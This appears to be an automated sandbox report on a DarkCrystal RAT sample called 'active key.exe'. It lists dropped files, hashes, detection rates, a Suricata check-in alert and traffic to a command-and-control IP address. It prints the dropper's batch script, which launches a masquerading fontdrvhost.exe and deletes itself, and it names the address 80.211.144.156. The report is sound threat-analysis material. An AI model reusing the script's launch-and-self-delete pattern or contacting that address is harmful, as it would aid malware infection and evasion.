                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.323856189774724
                                                            Encrypted:false
                                                            SSDEEP:3:sXtWQLmBtW:s91mG
                                                            MD5:E3673C46DD9C643D83C48383663F6392
                                                            SHA1:7B8ED372211C3175824B00B7626C1318B3EFBCD5
                                                            SHA-256:2EE2870ADC981F96889E64375C1593B492AF1D0F743445A8F3485F8BB84C9778
                                                            SHA-512:8816A2D6CD4DF05011E5F4F0161871BDB13FA3E79FFC9B0DBFAE6D8BB6C09612A2E50060EDFF1DB307ABDDB4FEBACA415621344E3845883F40DA29B564BC2C99
                                                            Malicious:false
                                                            Preview:Su1Xhh09CHsx7nCvpxLlXqQ3t
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):5.144130830697301
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mV4jEBDWCSBktKcKZG1N+E2J5xAITqt0Gq:hCRLuVFOOr+DEejEBDGKOZG1N723fTqa
                                                            MD5:D6715DEAF8961699F0B7CFBFAC6170AB
                                                            SHA1:04CCBDF2FC2B80D29680221009596DB12DED4B65
                                                            SHA-256:E3D9004E5E8212163E88AD72687EC5C444D6EC27BE086FB0D93B387E126B2315
                                                            SHA-512:ADA5D3B36328A9B5396C11639935D3FB700463D3AE4C75E24709D93DDF392325EA15C132765F92461728C5BD3A1368679DD379086F8B8F0BDA880958E40FA0DC
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\tracing\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\rtOHKAESQQ.bat"
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            • Antivirus: Virustotal, Detection: 29%
                                                            Joe Sandbox View:
                                                            • Filename: cuAvoExY41.exe, Detection: malicious
                                                            • Filename: TwfUz3FuO7.exe, Detection: malicious
                                                            • Filename: 9i0GfIAfU7.exe, Detection: malicious
                                                            • Filename: i3F8zuP3u9.exe, Detection: malicious
                                                            • Filename: z3yAH0LL5e.exe, Detection: malicious
                                                            • Filename: 4ra1Fo2Zql.exe, Detection: malicious
                                                            • Filename: BUKHuBek8M.exe, Detection: malicious
                                                            • Filename: ugRGgCJhQl.exe, Detection: malicious
                                                            • Filename: eCGKhYZtgx.exe, Detection: malicious
                                                            • Filename: czcgyt.exe, Detection: malicious
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 11%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            • Antivirus: Virustotal, Detection: 28%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:modified
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 11%
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            • Antivirus: Virustotal, Detection: 28%
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):95
                                                            Entropy (8bit):5.4446571558090415
                                                            Encrypted:false
                                                            SSDEEP:3:hznxa1oMuvcLVnroyay2Rkx9if4gKI30KUQKuWPRq:hznjCrv52Rw847IkKrWPs
                                                            MD5:80AA1C5E06F6555791412CDCDA136E67
                                                            SHA1:428BA9A222B2BB91730BD67D8597369C2088D03D
                                                            SHA-256:ED9395C9B907EAF31AEEFE0E17DCF556077B025FDD0646A1CFA6E49502D0C248
                                                            SHA-512:4E304C8ED779B33955AEC9F73F2DB6EF141C357F734952BE2AA56104433BF88D6AC672AF5BA6754978DFE40325BAE9F1DB0567D02F8E39A9649ADB9C1088FD02
                                                            Malicious:false
                                                            Preview:kmD4fsWBY2CwAoPXZb7iKHzHb9w0Yp8dESNpgWdIWSbTZcnTXHuzyk4cw6cf6gnt4jrrbj1D7yM2qgs8WdcQ4JoeYu3j48M
                                                            Process:C:\Users\user\Desktop\active key.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:modified
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (427), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):427
                                                            Entropy (8bit):5.85223997241267
                                                            Encrypted:false
                                                            SSDEEP:12:xJZnTcib2QxHMZTNJoT9wO2MQTNUSMrBblnzjDYrHfLUn:f1cepHM/exwO2RTNTGplnzwUn
                                                            MD5:9BE18CBCA9887C3BCBE08EF459F45817
                                                            SHA1:F8F120DE0268913275562387FB1393E76FD7648D
                                                            SHA-256:C9D5D2A95B695A9E4909FB06ED2BA6B8245BE23B5EE14AD26749ACFE518512B3
                                                            SHA-512:1AB41963EF8A9875ECDD4B16F0B27B260DAD4AFE722BABC1CF2CB88A48A5B99C92AC7CE3A82699063BAAF5DF84F7F63647DE33E7532D6661850E5E32F42DDD91
                                                            Malicious:false
                                                            Preview:qfGIKUwArM0nADYeVxUiieOtrUsxDE7UUMl0deT5b8HbNOImstoe411MRWb0l87mOgTybiA0dZHkWxgdLGEUadacVYiGDdUcBfMr4UKJsxAfuQ0ez7of3nMvG0cC93wAFoj1kzi154lmc4rFiERFzyjXSblE1IJyBAZGq93AZwk8CjSLIXe5mrLQFLiJNe9wvwlcflYjKQqCOkVtIa5eoOLUzJBeauw5xxNP8zqh94vWAICezzAxifIhkRnVj3IZduPbWFuTuXftczTqHgolt8XRoqprMU8FwW2Q3kItErDKAZEu87OCOhpeX7wpaDGZZZ7G6CwgY5gC4MRPm4tOF51PqX36ydTBkovkb8y5LsoTAnkLqhDfU2UdirZiJzr4lebQaqxnGxDXQhODxrQRZyrsURCtiPwVAtsfLTu9tZY
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):146
                                                            Entropy (8bit):5.682329952951123
                                                            Encrypted:false
                                                            SSDEEP:3:cp9g7XzSkEEGt/0HohX0ym6TRqvlaqyGDN9GSRbPD03whrikxcph:c/0X+kEEn1ymUUla8uSZPD0AViRP
                                                            MD5:2C55C9E7F3147FD32BE49504EEE3537C
                                                            SHA1:A6D78B3D472F9C762FCE8283BAFC348B2C007994
                                                            SHA-256:8A8D15BC6A61DAC73A3C3F6E5A850048F70AA5749FE940D5D1420C9DBB156D80
                                                            SHA-512:6700886543B9D2DF222EFE2A035185F6D0777EB7BA33DA577517F3C4FC82CA2A861DFF1A80C3DB4FE690584A30192540729F635403D9E4A0E2932EA6A64CB21B
                                                            Malicious:false
                                                            Preview:DIRrpFo5C5snYa0TYOnFzTHZ73hYADwWNyDXAVcpLMqZQEoZM2fHS4TuA1uvhP58IWajXdSDv83mmrJ2PHMIipDTfSWJkqH5RsQ3oECtjcVUAqHTr1gZDxadSGEEGJcF08U4bPOKFciGUtTyLD
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%
                                                            Process:C:\Users\user\Desktop\active key.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):3.418295834054489
                                                            Encrypted:false
                                                            SSDEEP:3:uKwLL:uK+L
                                                            MD5:762D253175E8E29F4492CC1665F0E3DF
                                                            SHA1:E3F69290ED593EC0BBB98D28E837F82A6A74B244
                                                            SHA-256:ECCA0B400F34B416DC75199C6A510CB800098C8BE1564DC2B35E284E5DB8F926
                                                            SHA-512:8756F59D3E0CEB68AF513E28DFE59DD4D4D2B23E03BAB6C6235DC347C3A599CAF0B190E9497EFCBA3A981B101925E347A3B94C5D48121C05F9844FD8EDC40E54
                                                            Malicious:false
                                                            Preview:.. Loading..
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.618543484589417
                                                            Encrypted:false
                                                            SSDEEP:12:Pp5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:rdUOAokItULVDv
                                                            MD5:1111FE8E3F5AF574FABA8BC5B610148D
                                                            SHA1:97F131559F13C4A151D97F23065EE6E10E8F63F5
                                                            SHA-256:15300385CB48B1F8DA78180F2F772A2F89872019F54E9FFDBBE5FA188E1155EA
                                                            SHA-512:71163771D36565FA7E20D5391C6B8A71AC1F0779EF494709C49CFF8FFD182C6F10557E8E83889DC5EDD3F146B88E3E0AC0FCEF066B487F65E287B250A0B682BA
                                                            Malicious:false
                                                            Preview:..Pinging 971342 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                            Entropy (8bit):7.980437803410312
                                                            TrID:
                                                            • Win64 Executable Console (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:active key.exe
                                                            File size:4'691'456 bytes
                                                            MD5:608de9b0cd5ec54b879965fddbbb9db6
                                                            SHA1:a3f0a61fd95098d0389f5e1f7f13850a19338e86
                                                            SHA256:03ee73148f5cbc60f1b281557d813ed9ba7a3097e99bdcf296df70a3777bd3c0
                                                            SHA512:1a28ea849787ea4f8ba1aa7cecf31fb6ccbdfaa7e1b7dfe89167cf1a2ce1d73a7aebeecf987e6628265e0eb1231b6fd567f43eb294d2773038ef541ea06e933e
                                                            SSDEEP:98304:QUbaFUETkqqT93mhTn+PQ0Bl4SyFFewX7N9iCwnVt8L9:QtFUHqqTI9+PQ0zyF0wX59mVt8L9
                                                            TLSH:AC2633EBF0968BE7C1414534625286B33B7B60684785A01C70ECDE987F9674D8F0A7AF
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u...|.;.c....CU.}....C..q....C.......C..Y....C..s....A..V...u................A..w....A..w...fD..f...fDW.t...fD..t..
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x140734bf5
                                                            Entrypoint Section:.vmp1
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66982A60 [Wed Jul 17 20:32:32 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:e29cb7df0c6506c425797e8b10902aaa
                                                            Instruction
                                                            jmp 00007FE058B83F7Ah
                                                            dec ebp
                                                            push es
                                                            add al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007FE058934B94h
                                                            jne 00007FE058B83FB1h
                                                            loopne 00007FE058B83F2Dh
                                                            xchg eax, edx
                                                            fstp tbyte ptr [ebx]
                                                            Programming Language:
                                                            • [IMP] VS2008 SP1 build 30729
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9095d8 | 0x2bc | .vmp1
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x93a000 | 0x1e0 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x9305a0 | 0x7f14 | .vmp1
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x939000 | 0x59c | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x721790 | 0x28 | .vmp1
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x930460 | 0x140 | .vmp1
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x72b000 | 0x2b0 | .vmp1
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0x7924c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0x7b000 | 0x1d216 | 0x1d400 | 40c71e8e0639c5d66030f286595fd72b | False | 0.49366486378205127 | data | 6.250767296487164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0x99000 | 0x1a3488 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .pdata | 0x23d000 | 0x5328 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .vmp0 | 0x243000 | 0x299017 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .vmp1 | 0x4dd000 | 0x45b4b4 | 0x45b600 | 33f5ce7fdc1b1897cac93860a39592de | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x939000 | 0x59c | 0x600 | 48959b7f0ca6e96ae6fc8733d1c11870 | False | 0.5638020833333334 | data | 5.204436137432093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x93a000 | 0x1e0 | 0x200 | 2973a463c75f3eb9cb63c36a6ec0c104 | False | 0.5390625 | data | 4.772037401703051 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_MANIFEST | 0x93a058 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
KERNEL32.dll | HeapReAlloc
USER32.dll | MoveWindow
ADVAPI32.dll | CryptDestroyHash
SHELL32.dll | ShellExecuteA
OLEAUT32.dll | VariantClear
MSVCP140.dll | ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ
SHLWAPI.dll | PathFindFileNameW
PSAPI.DLL | GetModuleInformation
ntdll.dll | RtlCaptureContext
Normaliz.dll | IdnToAscii
WLDAP32.dll |
CRYPT32.dll | CertOpenStore
WS2_32.dll | WSAGetLastError
RPCRT4.dll | UuidToStringA
USERENV.dll | UnloadUserProfile
VCRUNTIME140.dll | strrchr
VCRUNTIME140_1.dll | __CxxFrameHandler4
api-ms-win-crt-stdio-l1-1-0.dll | _get_stream_buffer_pointers
api-ms-win-crt-runtime-l1-1-0.dll | _initialize_narrow_environment
api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode
api-ms-win-crt-string-l1-1-0.dll | strncmp
api-ms-win-crt-time-l1-1-0.dll | strftime
api-ms-win-crt-math-l1-1-0.dll | ceilf
api-ms-win-crt-filesystem-l1-1-0.dll | _stat64
api-ms-win-crt-convert-l1-1-0.dll | atoi
api-ms-win-crt-environment-l1-1-0.dll | getenv
api-ms-win-crt-locale-l1-1-0.dll | localeconv
api-ms-win-crt-utility-l1-1-0.dll | qsort
WTSAPI32.dll | WTSSendMessageW
KERNEL32.dll | GetCurrentProcess
USER32.dll | CharUpperBuffW
ADVAPI32.dll | RegQueryValueExA
KERNEL32.dll | LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
ADVAPI32.dll | OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-09-02T13:33:41.567921+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49732 | 80 | 192.168.2.6 | 80.211.144.156
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Sep 2, 2024 13:33:55.466629028 CEST4975880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.467454910 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.472839117 CEST804975580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:55.472915888 CEST4975580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.473252058 CEST804975880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:55.473325968 CEST4975880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.473331928 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:55.473416090 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.473639011 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.486298084 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:55.822818995 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:55.828944921 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.127371073 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.181000948 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.255502939 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.409708023 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.410851955 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.415071011 CEST804975980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.415188074 CEST4975980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.415833950 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.415921926 CEST4976080192.168.2.680.211.144.156
